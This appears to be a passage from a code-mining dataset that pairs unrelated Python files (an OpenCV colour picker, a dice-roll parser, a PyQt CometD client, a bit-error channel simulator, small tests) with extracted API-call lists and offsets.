[((385, 392), 'datetime.time', 'time', (['(9)'], {}), '(9)\n', (389, 392), False, 'from datetime import time, timedelta\n'), ((418, 436), 'datetime.timedelta', 'timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (427, 436), False, 'from datetime import time, timedelta\n'), ((458, 466), 'datetime.time', 'time', (['(11)'], {}), '(11)\n', (462, 466), False, 'from datetime import time, timedelta\n'), ((493, 514), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(49)'}), '(minutes=49)\n', (502, 514), False, 'from datetime import time, timedelta\n'), ((534, 546), 'datetime.time', 'time', (['(11)', '(50)'], {}), '(11, 50)\n', (538, 546), False, 'from datetime import time, timedelta\n'), ((571, 592), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(10)'}), '(minutes=10)\n', (580, 592), False, 'from datetime import time, timedelta\n')]
|
# -*- coding: utf-8 -*-
import cv2
import sys
import numpy as np
import argparse
imagePath = "img.png"
sx = sy = None
previewImage = None
if len(sys.argv) < 3:
print("""
Usage:
python mouseInteractive -i img.png
""")
sys.exit(-1)
if sys.argv[1]=="-i":
imagePath = sys.argv[2]
def createBlankImage(width, height, color=(255,255,255)):
img = np.zeros((height, width, 3), np.uint8)
img[:] = color
return img
def mouseCallback(event,x,y,flags,param):
global sx,sy,previewImage
if (event == cv2.EVENT_LBUTTONDOWN):
print(event,x,y,flags,param)
bgrColor = frame[y][x]
previewImage = createBlankImage(200,200,bgrColor)
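        # cvtColor expects an image-shaped array, so reshape the single BGR
        # pixel (a 3-vector) into a 1x1 three-channel image before converting.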
hsvColor = cv2.cvtColor(bgrColor.reshape(1,1,3),cv2.COLOR_BGR2HSV)
print("bgr->hsv:{}->{}".format(bgrColor,hsvColor.tolist()[0][0]))
cv2.circle(frame,(x,y),6, (0,0,255),-1)
        if sx is not None:
cv2.line(frame,(sx,sy),(x,y),(0,0,255),3)
sx = x
sy = y
cv2.imshow('demo', frame)
cv2.imshow('preview', previewImage)
frame = cv2.imread(imagePath)
cv2.namedWindow("demo")
cv2.namedWindow("preview")
cv2.moveWindow("demo", 1500, 300)
cv2.moveWindow("preview", 1500, 80)
cv2.imshow('demo', frame)
cv2.setMouseCallback('demo', mouseCallback)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"cv2.line",
"cv2.circle",
"cv2.waitKey",
"cv2.destroyAllWindows",
"numpy.zeros",
"cv2.imread",
"cv2.setMouseCallback",
"sys.exit",
"cv2.moveWindow",
"cv2.imshow",
"cv2.namedWindow"
] |
[((1089, 1110), 'cv2.imread', 'cv2.imread', (['imagePath'], {}), '(imagePath)\n', (1099, 1110), False, 'import cv2\n'), ((1112, 1135), 'cv2.namedWindow', 'cv2.namedWindow', (['"""demo"""'], {}), "('demo')\n", (1127, 1135), False, 'import cv2\n'), ((1136, 1162), 'cv2.namedWindow', 'cv2.namedWindow', (['"""preview"""'], {}), "('preview')\n", (1151, 1162), False, 'import cv2\n'), ((1163, 1196), 'cv2.moveWindow', 'cv2.moveWindow', (['"""demo"""', '(1500)', '(300)'], {}), "('demo', 1500, 300)\n", (1177, 1196), False, 'import cv2\n'), ((1197, 1232), 'cv2.moveWindow', 'cv2.moveWindow', (['"""preview"""', '(1500)', '(80)'], {}), "('preview', 1500, 80)\n", (1211, 1232), False, 'import cv2\n'), ((1233, 1258), 'cv2.imshow', 'cv2.imshow', (['"""demo"""', 'frame'], {}), "('demo', frame)\n", (1243, 1258), False, 'import cv2\n'), ((1259, 1302), 'cv2.setMouseCallback', 'cv2.setMouseCallback', (['"""demo"""', 'mouseCallback'], {}), "('demo', mouseCallback)\n", (1279, 1302), False, 'import cv2\n'), ((1304, 1318), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1315, 1318), False, 'import cv2\n'), ((1319, 1342), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1340, 1342), False, 'import cv2\n'), ((248, 260), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (256, 260), False, 'import sys\n'), ((381, 419), 'numpy.zeros', 'np.zeros', (['(height, width, 3)', 'np.uint8'], {}), '((height, width, 3), np.uint8)\n', (389, 419), True, 'import numpy as np\n'), ((853, 898), 'cv2.circle', 'cv2.circle', (['frame', '(x, y)', '(6)', '(0, 0, 255)', '(-1)'], {}), '(frame, (x, y), 6, (0, 0, 255), -1)\n', (863, 898), False, 'import cv2\n'), ((1010, 1035), 'cv2.imshow', 'cv2.imshow', (['"""demo"""', 'frame'], {}), "('demo', frame)\n", (1020, 1035), False, 'import cv2\n'), ((1044, 1079), 'cv2.imshow', 'cv2.imshow', (['"""preview"""', 'previewImage'], {}), "('preview', previewImage)\n", (1054, 1079), False, 'import cv2\n'), ((930, 979), 'cv2.line', 'cv2.line', (['frame', '(sx, sy)', '(x, y)', '(0, 0, 255)', '(3)'], {}), '(frame, (sx, sy), (x, y), (0, 0, 255), 3)\n', (938, 979), False, 'import cv2\n')]
|
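A minimal sketch (not part of the row above) of the single-pixel colour conversion that mouseCallback performs: cv2.cvtColor expects an image-shaped array, so the lone BGR pixel is reshaped to 1x1x3 first; the pixel value here is an arbitrary assumption.
import cv2
import numpy as np
bgr_pixel = np.array([30, 60, 200], dtype=np.uint8)  # assumed example pixel (B, G, R)
hsv_pixel = cv2.cvtColor(bgr_pixel.reshape(1, 1, 3), cv2.COLOR_BGR2HSV)
print("bgr->hsv:{}->{}".format(bgr_pixel.tolist(), hsv_pixel.tolist()[0][0]))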
#
# Copyright (c) 2019, Neptune Labs Sp. z o.o.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
from collections import namedtuple
from enum import Enum
ChannelNameWithTypeAndNamespace = namedtuple(
"ChannelNameWithType",
['channel_id', 'channel_name', 'channel_type', 'channel_namespace']
)
ChannelIdWithValues = namedtuple('ChannelIdWithValues', ['channel_id', 'channel_values'])
class ChannelType(Enum):
TEXT = 'text'
NUMERIC = 'numeric'
IMAGE = 'image'
class ChannelNamespace(Enum):
USER = 'user'
SYSTEM = 'system'
class ChannelValue(object):
def __init__(self, x, y, ts):
self._x = x
self._y = y
if ts is None:
ts = time.time()
self._ts = ts
@property
def ts(self):
return self._ts
@property
def x(self):
return self._x
@property
def y(self):
return self._y
def __str__(self):
return 'ChannelValue(x={},y={},ts={})'.format(self.x, self.y, self.ts)
def __repr__(self):
return str(self)
def __eq__(self, o):
return self.__dict__ == o.__dict__
def __ne__(self, o):
return not self.__eq__(o)
|
[
"collections.namedtuple",
"time.time"
] |
[((700, 806), 'collections.namedtuple', 'namedtuple', (['"""ChannelNameWithType"""', "['channel_id', 'channel_name', 'channel_type', 'channel_namespace']"], {}), "('ChannelNameWithType', ['channel_id', 'channel_name',\n 'channel_type', 'channel_namespace'])\n", (710, 806), False, 'from collections import namedtuple\n'), ((835, 902), 'collections.namedtuple', 'namedtuple', (['"""ChannelIdWithValues"""', "['channel_id', 'channel_values']"], {}), "('ChannelIdWithValues', ['channel_id', 'channel_values'])\n", (845, 902), False, 'from collections import namedtuple\n'), ((1209, 1220), 'time.time', 'time.time', ([], {}), '()\n', (1218, 1220), False, 'import time\n')]
|
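A minimal usage sketch for the channel types defined above, assuming the definitions are in scope; the channel id and coordinates are made-up example values (passing ts=None makes ChannelValue fall back to time.time()).
value = ChannelValue(x=1, y=0.5, ts=None)  # ts defaults to the current time
batch = ChannelIdWithValues(channel_id='ch-1', channel_values=[value])
print(batch.channel_id, batch.channel_values[0])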
#
# dice_roll_parser.py
#
# Copyright 2021, <NAME>
#
from plusminus import BaseArithmeticParser
# fmt: off
class DiceRollParser(BaseArithmeticParser):
"""
Parser for evaluating expressions representing rolls of dice, as used in many board and
role-playing games, such as:
d20
3d20
5d6 + d20
min(d6, d6, d6)
maxn(2, d6, d6, d6) (select top 2 of 3 d6 rolls)
show(d6, d6, d6)
"""
def customize(self):
import random
self.add_operator("d", 1, BaseArithmeticParser.RIGHT,
lambda a: random.randint(1, a))
self.add_operator("d", 2, BaseArithmeticParser.LEFT,
lambda a, b: sum(random.randint(1, b) for _ in range(a)))
self.add_function("min", ..., min)
self.add_function("max", ..., max)
self.add_function("show", ...,
lambda *args: {"rolls": list(args), "sum": sum(args)})
def maxn(n, *values):
ret = sorted(values, reverse=True)[:n]
return {"n": n, "rolls": values, "maxn": ret, "sum": sum(ret)}
self.add_function("maxn", ..., maxn)
# fmt: on
if __name__ == '__main__':
parser = DiceRollParser()
parser.runTests(
"""\
d20
3d6
d20+3d4
2d100
max(d6, d6, d6)
show(d6, d6, d6)
""",
postParse=lambda _, result: result[0].evaluate(),
)
|
[
"random.randint"
] |
[((593, 613), 'random.randint', 'random.randint', (['(1)', 'a'], {}), '(1, a)\n', (607, 613), False, 'import random\n'), ((719, 739), 'random.randint', 'random.randint', (['(1)', 'b'], {}), '(1, b)\n', (733, 739), False, 'import random\n')]
|
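A minimal sketch of evaluating a single expression with the parser above, assuming plusminus is installed and that BaseArithmeticParser exposes evaluate() as in the package's own examples.
parser = DiceRollParser()
print(parser.evaluate("3d6 + d20"))            # a random integer, e.g. 17
print(parser.evaluate("maxn(2, d6, d6, d6)"))  # dict with the rolls, the top 2, and their sum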
"""Synchronous CometD client"""
from enum import IntEnum, unique, auto
import asyncio
from functools import partial
from typing import Optional, Iterable, TypeVar, Awaitable, Callable, Any
import concurrent.futures as futures
from contextlib import suppress
import aiocometd
from aiocometd.typing import JsonObject
# pylint: disable=no-name-in-module
from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject # type: ignore
# pylint: enable=no-name-in-module
from aiocometd_chat_demo.exceptions import InvalidStateError
T_co = TypeVar("T_co", covariant=True) # pylint: disable=invalid-name
def run_coro(coro: Awaitable[T_co],
callback: Optional[Callable[["futures.Future[T_co]"], Any]]
= None,
loop: Optional[asyncio.AbstractEventLoop] = None,) \
-> "futures.Future[T_co]":
"""Schedule the execution of the given *coro* and set *callback* to be
called when the *coro* is finished
:param coro: A coroutine
:param callback: A callback function called with the future object \
associated with *coro*
:param loop: The event loop on which the *coro* should be scheduled
:return: The future associated with the *coro*
"""
if loop is None:
loop = asyncio.get_event_loop()
future = asyncio.run_coroutine_threadsafe(coro, loop)
if callback is not None:
future.add_done_callback(callback)
return future
@unique
class ClientState(IntEnum):
"""CometD client states"""
#: Connected with the server
CONNECTED = auto()
#: Disconnected state
DISCONNECTED = auto()
#: Disconnected state due to an error
ERROR = auto()
# pylint: disable=too-few-public-methods
class MessageResponse(QObject): # type: ignore
"""The asynchronous result of a sent CometD message"""
#: Contains the exception object if finished with an error, otherwise None
error: Optional[BaseException] = None
#: Contains the response of the server when finished successfully,
#: otherwise None
result: Optional[JsonObject] = None
    #: Emitted when the response has been received
finished = pyqtSignal()
# pylint: enable=too-few-public-methods
# pylint: disable=too-many-instance-attributes
class CometdClient(QObject): # type: ignore
"""Synchronous CometD client implementation
This class enables the asynchronous Client class from aiocometd to be used
in synchronous code if it runs on a quamash event loop.
Since the event loop is shared by Qt's and asyncio's events, the
    concurrent.futures.Future can't be awaited and blocking is not allowed.
Instead, this class is implemented similarly to how asynchronous network
operations are implemented in Qt. Namely, on a method call the operation
is started and the method immediately returns, and then the results or the
potential errors during the asynchronous operation are broadcasted with
signals.
"""
    #: Signal emitted when the client's state is changed
    state_changed = pyqtSignal(ClientState)
    #: Signal emitted when the client enters the :obj:`~ClientState.CONNECTED`
    #: state
    connected = pyqtSignal()
    #: Signal emitted when the client enters the
    #: :obj:`~ClientState.DISCONNECTED` state
    disconnected = pyqtSignal()
    #: Signal emitted when the client enters the :obj:`~ClientState.ERROR` state
    error = pyqtSignal(Exception)
    #: Signal emitted when a message has been received from the server
    message_received = pyqtSignal(dict)
def __init__(self, url: str, subscriptions: Iterable[str],
loop: Optional[asyncio.AbstractEventLoop] = None) -> None:
"""
:param url: CometD service url
:param subscriptions: A list of channels to which the client should \
subscribe
:param loop: Event :obj:`loop <asyncio.BaseEventLoop>` used to
schedule tasks. If *loop* is ``None`` then
:func:`asyncio.get_event_loop` is used to get the default
event loop.
"""
super().__init__()
self._url = url
self._subscriptions = list(subscriptions)
self._loop = loop or asyncio.get_event_loop()
self._client: Optional[aiocometd.Client] = None
self._state = ClientState.DISCONNECTED
self._state_signals = {
ClientState.CONNECTED: self.connected,
ClientState.DISCONNECTED: self.disconnected,
}
self._connect_task: Optional["futures.Future[None]"] = None
@pyqtProperty(ClientState, notify=state_changed)
def state(self) -> ClientState:
"""Current state of the client"""
return self._state
@state.setter # type: ignore
def state(self, new_state: ClientState) -> None:
"""Set the state of the client to *state*"""
        # if the state didn't change then don't do anything
if new_state != self._state:
self._state = new_state
# notify listeners that the state changed
self.state_changed.emit(self._state)
# emit state specific signals
if new_state in self._state_signals:
self._state_signals[new_state].emit()
def connect_(self) -> None:
"""Connect to the CometD service and start listening for messages
The function returns immediately. On success the
        :obj:`~CometdClient.connected` signal is emitted or the
:obj:`~CometdClient.error` signal on failure. If the client is already
connected then it does nothing.
"""
# don't do anything if already connected
if self.state != ClientState.CONNECTED:
# schedule the coroutine for execution
self._connect_task = run_coro(
self._connect(),
self._on_connect_done,
self._loop
)
async def _connect(self) -> None:
"""Connect to the CometD service and retreive the messages sent by
the service as long as the client is open
"""
# connect to the service
async with aiocometd.Client(self._url, loop=self._loop) as client:
# set the asynchronous client attribute
self._client = client
# subscribe to all the channels
for subscription in self._subscriptions:
await client.subscribe(subscription)
# put the client into a connected state
self.state = ClientState.CONNECTED
# listen for incoming messages
with suppress(futures.CancelledError):
async for message in client:
# emit signal about received messages
self._loop.call_soon_threadsafe(self.message_received.emit,
message)
# clear the asynchronous client attribute
self._client = None
# put the client into a disconnected state
self.state = ClientState.DISCONNECTED
def _on_connect_done(self, future: "futures.Future[None]") -> None:
"""Evaluate the result of an asynchronous task
Emit signals about errors if the *future's* result is an exception.
:param future: A future associated with the asynchronous task
"""
# clear the task member
self._connect_task = None
error = None
with suppress(futures.CancelledError):
error = future.exception()
if error is not None:
self.state = ClientState.ERROR
self.error.emit(error)
def disconnect_(self) -> None:
"""Disconnect from the CometD service
If the client is not connected it does nothing.
"""
if self.state == ClientState.CONNECTED:
# check that the task has been initialized
if self._connect_task is None:
raise InvalidStateError("Uninitialized _connect_task "
"attribute.")
self._connect_task.cancel()
def publish(self, channel: str, data: JsonObject) -> MessageResponse:
"""Publish *data* to the given *channel*
:param channel: Name of the channel
:param data: Data to send to the server
:return: Return the response associated with the message
"""
# check that the client has been initialized
if self.state != ClientState.CONNECTED:
raise InvalidStateError("Can't send messages in a non-connected "
"state.")
if self._client is None:
raise InvalidStateError("Uninitialized _client attribute.")
response = MessageResponse()
run_coro(self._client.publish(channel, data),
partial(self._on_publish_done, response),
self._loop)
return response
@staticmethod
def _on_publish_done(response: MessageResponse,
future: "futures.Future[JsonObject]") -> None:
"""Evaluate the result of an asynchronous message sending task
:param response: A response associated with the *future*
:param future: A future associated with the asynchronous task
"""
# set the error or result attributes of the response depending on
# whether it was completed normally or it exited with an exception
if future.exception() is not None:
response.error = future.exception()
else:
response.result = future.result()
# notify listeners that a response has been received
response.finished.emit()
# pylint: disable=too-many-instance-attributes
|
[
"PyQt5.QtCore.pyqtSignal",
"functools.partial",
"asyncio.get_event_loop",
"aiocometd_chat_demo.exceptions.InvalidStateError",
"contextlib.suppress",
"aiocometd.Client",
"PyQt5.QtCore.pyqtProperty",
"asyncio.run_coroutine_threadsafe",
"enum.auto",
"typing.TypeVar"
] |
[((533, 564), 'typing.TypeVar', 'TypeVar', (['"""T_co"""'], {'covariant': '(True)'}), "('T_co', covariant=True)\n", (540, 564), False, 'from typing import Optional, Iterable, TypeVar, Awaitable, Callable, Any\n'), ((1279, 1323), 'asyncio.run_coroutine_threadsafe', 'asyncio.run_coroutine_threadsafe', (['coro', 'loop'], {}), '(coro, loop)\n', (1311, 1323), False, 'import asyncio\n'), ((1532, 1538), 'enum.auto', 'auto', ([], {}), '()\n', (1536, 1538), False, 'from enum import IntEnum, unique, auto\n'), ((1584, 1590), 'enum.auto', 'auto', ([], {}), '()\n', (1588, 1590), False, 'from enum import IntEnum, unique, auto\n'), ((1645, 1651), 'enum.auto', 'auto', ([], {}), '()\n', (1649, 1651), False, 'from enum import IntEnum, unique, auto\n'), ((2121, 2133), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', ([], {}), '()\n', (2131, 2133), False, 'from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject\n'), ((3005, 3028), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', (['ClientState'], {}), '(ClientState)\n', (3015, 3028), False, 'from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject\n'), ((3136, 3148), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', ([], {}), '()\n', (3146, 3148), False, 'from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject\n'), ((3262, 3274), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', ([], {}), '()\n', (3272, 3274), False, 'from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject\n'), ((3367, 3388), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', (['Exception'], {}), '(Exception)\n', (3377, 3388), False, 'from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject\n'), ((3482, 3498), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', (['dict'], {}), '(dict)\n', (3492, 3498), False, 'from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject\n'), ((4527, 4574), 'PyQt5.QtCore.pyqtProperty', 'pyqtProperty', (['ClientState'], {'notify': 'state_changed'}), '(ClientState, notify=state_changed)\n', (4539, 4574), False, 'from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject\n'), ((1241, 1265), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (1263, 1265), False, 'import asyncio\n'), ((4175, 4199), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (4197, 4199), False, 'import asyncio\n'), ((6094, 6138), 'aiocometd.Client', 'aiocometd.Client', (['self._url'], {'loop': 'self._loop'}), '(self._url, loop=self._loop)\n', (6110, 6138), False, 'import aiocometd\n'), ((7388, 7420), 'contextlib.suppress', 'suppress', (['futures.CancelledError'], {}), '(futures.CancelledError)\n', (7396, 7420), False, 'from contextlib import suppress\n'), ((8444, 8510), 'aiocometd_chat_demo.exceptions.InvalidStateError', 'InvalidStateError', (['"""Can\'t send messages in a non-connected state."""'], {}), '("Can\'t send messages in a non-connected state.")\n', (8461, 8510), False, 'from aiocometd_chat_demo.exceptions import InvalidStateError\n'), ((8601, 8654), 'aiocometd_chat_demo.exceptions.InvalidStateError', 'InvalidStateError', (['"""Uninitialized _client attribute."""'], {}), "('Uninitialized _client attribute.')\n", (8618, 8654), False, 'from aiocometd_chat_demo.exceptions import InvalidStateError\n'), ((8763, 8803), 'functools.partial', 'partial', (['self._on_publish_done', 'response'], {}), '(self._on_publish_done, response)\n', (8770, 8803), False, 'from functools import partial\n'), ((6547, 6579), 'contextlib.suppress', 'suppress', (['futures.CancelledError'], {}), '(futures.CancelledError)\n', (6555, 6579), False, 'from contextlib import suppress\n'), ((7888, 7947), 'aiocometd_chat_demo.exceptions.InvalidStateError', 'InvalidStateError', (['"""Uninitialized _connect_task attribute."""'], {}), "('Uninitialized _connect_task attribute.')\n", (7905, 7947), False, 'from aiocometd_chat_demo.exceptions import InvalidStateError\n')]
|
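A standalone sketch of the run_coro pattern used above: schedule a coroutine on an asyncio loop running in a worker thread and react in a done-callback. The coroutine and loop/thread names are illustrative, not part of the client.
import asyncio
import threading
async def demo_coro():
    await asyncio.sleep(0.1)
    return 42
loop = asyncio.new_event_loop()
threading.Thread(target=loop.run_forever, daemon=True).start()  # run the loop off the main thread
future = asyncio.run_coroutine_threadsafe(demo_coro(), loop)
future.add_done_callback(lambda f: print("result:", f.result()))
print(future.result(timeout=1))  # blocks this thread until the coroutine finishes
loop.call_soon_threadsafe(loop.stop)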
from gi.repository import GObject
from pychess.Players.Engine import Engine
from pychess.Utils.const import NORMAL, ANALYZING, INVERSE_ANALYZING
TIME_OUT_SECOND = 60
class ProtocolEngine(Engine):
__gsignals__ = {
"readyForOptions": (GObject.SignalFlags.RUN_FIRST, None, ()),
"readyForMoves": (GObject.SignalFlags.RUN_FIRST, None, ()),
}
# Setting engine options
def __init__(self, subprocess, color, protover, md5):
Engine.__init__(self, md5)
self.engine = subprocess
self.defname = subprocess.defname
self.color = color
self.protover = protover
self.readyMoves = False
self.readyOptions = False
self.connected = True
self.mode = NORMAL
self.analyzing_paused = False
def isAnalyzing(self):
return self.mode in (ANALYZING, INVERSE_ANALYZING)
|
[
"pychess.Players.Engine.Engine.__init__"
] |
[((463, 489), 'pychess.Players.Engine.Engine.__init__', 'Engine.__init__', (['self', 'md5'], {}), '(self, md5)\n', (478, 489), False, 'from pychess.Players.Engine import Engine\n')]
|
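A minimal sketch of the __gsignals__ mechanism the engine above relies on: a GObject subclass declares its signals in a dict and emits them by name (the class and handler here are illustrative; requires PyGObject).
from gi.repository import GObject
class DemoEmitter(GObject.GObject):
    __gsignals__ = {"readyForMoves": (GObject.SignalFlags.RUN_FIRST, None, ())}
emitter = DemoEmitter()
emitter.connect("readyForMoves", lambda obj: print("engine ready"))
emitter.emit("readyForMoves")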
import numpy
class channel_noise_simulator:
"""Class to hold usefull funktions to simulate noise in a channel"""
def __init__(self):
return
# _____________create bits___________________
def create_random_bits_list(self, len):
"""create a random len bits long bitstring """
bits = []
for i in range(len):
bits.append(numpy.random.randint(0, 2))
return bits
def create_random_bits_string(self, len):
"""create a random len bits long string """
bits = ""
for i in range(len):
bits += str(numpy.random.randint(0, 2))
return bits
# _____________Randoise bits______________________
def randomise_bits_list(self, bits, probability):
"""A function to simply flip bits with the given probability
ARGS: a list of bits, the probability for an error[0-1]
RETURN: a list of bits
"""
new_bits = []
for b in bits:
if probability > numpy.random.random(): # roll random numbers
new_bits.append((b + 1) % 2) # turn 0 to 1 and 1 to 0
else:
new_bits.append(b)
return new_bits
def randomise_bits_string(self, bits, probability):
"""A function to simply flip bits with the given probability
ARGS: a list of bits, the probability for an error[0-1]
Return: a string full of bits
"""
new_bits = ""
for b in bits:
if probability > numpy.random.random(): # roll random numbers
new_bits += str((int(b) + 1) % 2) # turn 0 to 1 and 1 to 0
else:
new_bits += b
return new_bits
def randomise_bits_string_list(self, bits, probability):
"""A function to simply flip bits with the given probability
ARGS: a list of bits, the probability for an error[0-1]
RETURN: a list of bits
"""
new_bits = []
for b in bits:
new_bit = ""
for i in range(len(b)):
if probability > numpy.random.random(): # roll random numbers
new_bit += str((int(b[i]) + 1) % 2) # turn 0 to 1 and 1 to 0
else:
new_bit += str(b[i])
new_bits.append(new_bit)
return new_bits
def randomise_bits_burst_string_list(
self, bits, burst_probability, error_rate_in_burst=0.9,
):
"""A function to simply flip bits with the given probability
        ARGS: a list of bit strings, the probability of a burst starting [0-1], the probability of flipping each bit inside a burst [0-1]
        RETURN: a list of bit strings with added burst errors
"""
new_bits = []
currently_bursting = False
for b in bits:
i = 0
new_bits.append("")
while i < len(b):
if burst_probability > numpy.random.random(): # roll random numbers
currently_bursting = True
while currently_bursting and i < len(
b
): # stop when bitstream ends (simulate one bursterror and adjust i)
if error_rate_in_burst > numpy.random.random():
new_bits[len(new_bits) - 1] += str(
((int(b[i]) + 1) % 2)
) # turn 0 to 1 and 1 to 0 randomly
else:
new_bits[len(new_bits) - 1] += str(b[i])
currently_bursting = False
i += 1
else:
new_bits[len(new_bits) - 1] += str(b[i])
i += 1
return new_bits
def randomise_bits_burst_list(
self, bits, burst_probability, error_rate_in_burst=0.9
):
"""A function to simply flip bits with the given probability
        ARGS: a list of bits, the probability of a burst starting [0-1], the probability of flipping each bit inside a burst [0-1]
        Return: list of bits with added burst errors
"""
new_bits = []
i = 0
while i < len(bits):
if burst_probability > numpy.random.random(): # roll random numbers
currently_bursting = True
while currently_bursting and i < len(
bits
): # stop when bitstream ends (simulate one bursterror and adjust i)
if error_rate_in_burst > numpy.random.random():
new_bits.append(
(bits[i] + 1) % 2
) # turn 0 to 1 and 1 to 0 randomly
else:
new_bits.append(bits[i])
currently_bursting = False
i += 1
else:
new_bits.append(bits[i])
i += 1
return new_bits
def randomise_bits_burst_string(
self, bits, burst_probability, error_rate_in_burst=0.9,
):
"""A function to simply flip bits with the given probability
        ARGS: a string of bits, the probability of a burst starting [0-1], the probability of flipping each bit inside a burst [0-1]
        Return: string of bits with added burst errors
"""
new_bits = ""
i = 0
while i < len(bits):
if burst_probability > numpy.random.random(): # roll random numbers
currently_bursting = True
while currently_bursting and i < len(
bits
): # stop when bitstream ends (simulate one bursterror and adjust i)
if error_rate_in_burst > numpy.random.random():
new_bits += str(
((int(bits[i]) + 1) % 2)
) # turn 0 to 1 and 1 to 0 randomly
else:
new_bits += str(bits[i])
currently_bursting = False
i += 1
else:
new_bits += str(bits[i])
i += 1
return new_bits
# ______________compare bits__________________________
def compare_and_highlight_differences(self, bits1, bits2):
"""compare two bitlists and higlight the differences"""
differences = []
if len(bits1) != len(bits2):
print("waning, different lengths detected. may result in higher errorrate")
min_length = min(len(bits1), len(bits2))
for i in range(min_length):
differences.append(1 if bits1[i] != bits2[i] else 0)
print("Differences found: " + str(differences.count(True)))
return differences
# c=channel_noise_simulator()
# print (c.randomise_bits_list([1,1,1,1,0,0,0,0,1],0.5))
# print (c.randomise_bits_string("1101110",0.5))
# print (c.compare_and_highlight_differences([1,1,1,0,0,1,1,0,0,1,0,1,1,1],[0,1,1,0,0,1,1,1,1,1,0,1,0,1]))
# print (c.create_random_bits_list(200))
# rb= c.create_random_bits_string(200)
# rr = c.randomise_bits_burst_string(rb,0.01,.9)
# print (c.compare_and_highlight_differences(rb,rr))
# """
|
[
"numpy.random.randint",
"numpy.random.random"
] |
[((381, 407), 'numpy.random.randint', 'numpy.random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (401, 407), False, 'import numpy\n'), ((601, 627), 'numpy.random.randint', 'numpy.random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (621, 627), False, 'import numpy\n'), ((1019, 1040), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (1038, 1040), False, 'import numpy\n'), ((1537, 1558), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (1556, 1558), False, 'import numpy\n'), ((4238, 4259), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (4257, 4259), False, 'import numpy\n'), ((5434, 5455), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (5453, 5455), False, 'import numpy\n'), ((2118, 2139), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (2137, 2139), False, 'import numpy\n'), ((2937, 2958), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (2956, 2958), False, 'import numpy\n'), ((4537, 4558), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (4556, 4558), False, 'import numpy\n'), ((5733, 5754), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (5752, 5754), False, 'import numpy\n'), ((3253, 3274), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (3272, 3274), False, 'import numpy\n')]
|
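A small usage sketch for the simulator above, mirroring the commented examples at the end of the row; the probabilities are arbitrary.
c = channel_noise_simulator()
sent = c.create_random_bits_string(200)
received = c.randomise_bits_burst_string(sent, 0.01, 0.9)  # ~1% burst starts, 90% flips inside a burst
c.compare_and_highlight_differences(sent, received)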
# Copyright 2020 Curtin University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Author: <NAME>
import unittest
from observatory.platform.cli.click_utils import (
INDENT1,
INDENT2,
INDENT3,
INDENT4,
comment,
indent,
)
class TestClick(unittest.TestCase):
def test_indent(self):
original_str = "hello world"
# 2 spaces
output = indent(original_str, INDENT1)
self.assertEqual(f" {original_str}", output)
# 3 spaces
output = indent(original_str, INDENT2)
self.assertEqual(f" {original_str}", output)
# 4 spaces
output = indent(original_str, INDENT3)
self.assertEqual(f" {original_str}", output)
# 5 spaces
output = indent(original_str, INDENT4)
self.assertEqual(f" {original_str}", output)
# Check that values below 0 raise assertion error
with self.assertRaises(AssertionError):
indent(original_str, 0)
with self.assertRaises(AssertionError):
indent(original_str, -1)
def test_comment(self):
input_str = ""
output = comment(input_str)
self.assertEqual(output, "# ")
input_str = "Hello world"
output = comment(input_str)
self.assertEqual(output, "# Hello world")
|
[
"observatory.platform.cli.click_utils.indent",
"observatory.platform.cli.click_utils.comment"
] |
